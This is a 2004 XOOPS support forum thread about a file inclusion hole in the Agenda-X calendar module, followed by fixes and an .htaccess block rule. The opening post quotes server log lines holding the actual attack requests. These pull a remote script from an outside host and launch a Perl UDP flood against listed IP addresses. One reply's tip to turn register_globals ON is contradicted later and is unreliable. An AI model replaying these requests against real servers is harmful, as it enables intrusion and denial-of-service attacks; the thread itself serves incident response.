Get XOOPS XOOPSXOOPS FAQFAQ ForumsForums NewsNews ThemesThemes ModulesModules
New Posts New Topics All Posts All Forums Index General Modules Themes Development International XOOPS.org

Search


Advanced Search

Donat-O-Meter

Make donations with PayPal!
Stats
Goal: $100.00
Due Date: May 31
Gross Amount: $65.00
Net Balance: $61.80
Left to go: $38.20
Donations
studioC  ($25)May-17
Anonymous ($15)May-16
Anonymous ($25)May-4

Learn XOOPS Core

Click to see original Image in a new window
OOP with XOOPS

XOOPS API
XOOPS Blue Move XOOPS Giftshop XOOPS Blue Move
Share


Local Support

Advertisement

XOOPS Code hosted on SourceForge

Cumulus Tag Cloud

2 2.5 2.5.5 2.6 3.0 90 2013 Abuse alimento AntiHarvesting AntiMalUser AntiSpam API ASP Beats billige black Blocks blue Bytes Captcha cell Christmas chronolabs Client content Conversion demo docek download Dresses editor Elastic ELB evden eve Evening facebook floor free games herre Honeypot Human IP jQuery kantor Karaoke lamps log logger mobile module modules Monster MyAlbum-p nakliyat newbb news online oxygen PageRank Permissions pink Plugin portal Prevention profile project Protector publisher Rights rmcommon Room sale security Server site Smarty Spam SQL stem StopForumSpam Studio support tag tags tdmcreate Theme themes Twitter txmod User userlog website Whitepaper xoops XOOPS2 Xortify ZendFramework
more...

New Users

Registering user

# 136023

qinxian123

Welcome to XOOPS!

Forum Index

Board index » XOOPS Community Support forums » Q and A » Agendax vulnerability




Bottom   Previous Topic   Next Topic  Register To Post



#1 Posted on: 2004/5/22 22:56 Agendax vulnerability
I was contacted by my network folks telling me of a udp flood attack. We traced to malicious code being run in agendax. It looks like this:

servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:28:32 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"


I removed the mod for the moment. I did not find anything here. Anyone know anything?

--> Sorry, I found something deeper in the forum <--

Never mind

Top

socorro
Just popping in
Just popping in
Joined:
2004/3/21 7:21
Group:
Registered Users
Posts: 5
(Show More) (Show Less)


#2 Posted on: 2004/6/1 4:12 Re: Agendax vulnerability
I confirm security problem with agendax

One membre of xoops-france was hacked by brasilian hackers.

The blamed file is addevent.inc.php,the variable $agendax_path of this script is obviously not checked

Top

winsion
Just popping in
Just popping in
Joined:
2003/11/23 0:00
From Perpignan, France
Group:
Registered Users
Posts: 55
(Show More) (Show Less)


#3 Posted on: 2004/7/3 3:52 Re: Agendax vulnerability
please don't post this on a public forum....
Some hackers are very happy with this.. they don't have to search anymore.

In fact you should remove or rename this file asap... and do some corrections in this file

Top

philou
Quite a regular
Quite a regular
Joined:
2002/5/6 3:37
From France
Group:
Registered Users
Posts: 313
(Show More) (Show Less)


#4 Posted on: 2004/7/3 21:44 Re: Agendax vulnerability
Quote:

In fact you should remove or rename this file asap... and do some corrections in this file


My sites not live yet, but other than renaming the file, since I don't have the skills to make any corrections, should I just disable agendax?

Mod still seems to work after renmaing the file.

Top

FlySwatter
Just popping in
Just popping in
Joined:
2004/6/2 9:28
Group:
Registered Users
Posts: 71
(Show More) (Show Less)


#5 Posted on: 2004/7/4 1:38 Re: Agendax
The vulnerability described in above post affects only Agenda-X versions prior to 1.2.4

Solutions:
configure your PHP installation with register_global to ON
or download Agenda-x v1.2.4

The most recent version of Agenda-X is 2.1.1

---------
Chinese Web: http://www.wjue.org
English Web: http://www.guanxiCRM.com
Offshore IT Outsourcing: http://China-Offshore.com

Top

wjue
Not too shy to talk
Not too shy to talk
Joined:
2002/8/3 2:36
Group:
Registered Users
Posts: 185
(Show More) (Show Less)


#6 Posted on: 2004/7/4 8:03 Re: Agendax
I feel better now

Top

FlySwatter
Just popping in
Just popping in
Joined:
2004/6/2 9:28
Group:
Registered Users
Posts: 71
(Show More) (Show Less)


#7 Posted on: 2004/7/4 8:48 Re: Agendax
Wow, You Gotta Stop Scaring Me.

Top

iHackCode
Module Developer
Module Developer
Joined:
2004/6/28 19:11
From Greater Seattle Area
Group:
Registered Users
Wiki Group
Posts: 979
(Show More) (Show Less)


#8 Posted on: 2004/7/5 9:09 Re: Agendax
My server just got comprised by this.

Is there a list maintained somewhere that people can check.

Just a simple list of module and version would be a start.

The site was running 1.2

Top

datamile
Just popping in
Just popping in
Joined:
2002/11/24 8:00
From UK
Group:
Registered Users
Posts: 22
(Show More) (Show Less)


#9 Posted on: 2004/7/7 11:22 Re: Agendax
I don't know of a list but you should check the individual home sites of 3rd party modules you are running.

Agendax had a serious security issue and was fixed a while ago.

You should be sure to set Register_Globals OFF. The issue was around calling the addevent.inc.php file directly in the URL. Easy enough to prevent.

I still get daily attempts at this but they still don't get in. To make double sure they don't I have an .htaccess file with this in it:

-------------------------------
php_value register_globals 0

<files addevent.inc.php>
Order Deny,Allow
Deny from all
</files>
-------------------------------



Top

DonXoop
Joined:
2003/11/26 21:46
From Third stone, bluish, under siege
Group:
Registered Users
Posts: 1171
(Show More) (Show Less)



Board index » XOOPS Community Support forums » Q and A » Agendax vulnerability

Top   Previous Topic   Next Topic

  Register To Post


You can view topic.
You cannot start a new topic.
You cannot reply to posts.
You cannot edit your posts.
You cannot delete your posts.
You cannot add new polls.
You can vote in polls.
You cannot attach files to posts.
You cannot post without approval.
You cannot use topic type.
You cannot use HTML syntax.
You cannot use signature.

[Advanced Search]